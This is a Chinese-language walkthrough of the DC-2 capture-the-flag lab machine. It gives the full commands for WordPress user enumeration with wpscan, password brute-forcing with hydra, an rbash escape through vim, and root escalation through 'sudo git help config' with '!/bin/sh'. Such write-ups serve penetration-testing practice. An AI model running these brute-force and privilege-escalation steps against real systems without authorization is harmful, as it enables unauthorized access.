DC-2

DC-2

目录


发现靶机iparp-scan -l

访问发现找不到host,这里先添加host

DC-2

DC-2

web端成功访问,开始渗透之路

信息收集

DC-2

开了一个80。7744端口,wordpress组件 ,ssh改到7744端口上了,那就直接考虑对wordpress进行渗透吧

web打点

生成字典

DC-2

访问/flag,发现需要爆破,同时使用cewl

cewl是一个ruby应用,爬行指定url的指定深度。也可以跟一个外部链接,结果会返回一个单词列表,这个列表可以扔到工具里进行密码破解。

所以我们先使用cewl爬取网页上的词

cewl http://dc-2/ -w dict.txt

再使用wpscan进行扫描

wpscan --url http://dc-2 --enumerate u

DC-2

直接就找到了三个用户名,将三个用户名写入txt中,用hydra爆破

爆破

wordpress的默认后台在

http://dc-2/wp-login.php

由于kali linux里面的burp是社区版,爆破太慢了,直接用hydra爆了

hydra -L /root/桌面/username.txt -P /root/桌面/dict.txt dc-2 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

DC-2

爆出来两个账户名密码,登陆

DC-2

发现flag2

文件上传

发现有个文件上传点,尝试一波

DC-2

MIME类型检测,改一改

DC-2

直接没给写权限,尴尬了,换思路了

ssh连接

找不到什么可以利用的点,试试用刚刚的账户密码,登陆ssh试试

DC-2

用tom的账号登陆成功了,但是是rbash,很多命令不能用。

DC-2

看看能用哪些命令

DC-2

ls发现flag3就在当前目录下,直接vim
DC-2

看意思是要rbash逃逸

rbash逃逸

关于rbash文章

检查一遍,/不能用,不能连接ssh的时候逃逸了,尝试用vim

i进入编辑模式后,输入

:set shell=/bin/bash

再输入

:shell

DC-2

找到第四个flag

DC-2

看着提示需要git提权,找下怎么提权的

git提权

此时发现tom用户无git命令,切换到jerry用户下

先添加环境变量

echo $PATH         
export PATH=$PATH:/bin:/usr/bin

DC-2

成功切换到jerry下

sudo git help config

!/bin/sh

DC-2

提权成功

DC-2

最后的flag在root目录下

总结

  • rbash逃逸
  • git提权
  • cewl爬取
上一篇:Ingress对服务做限流


下一篇:DC-5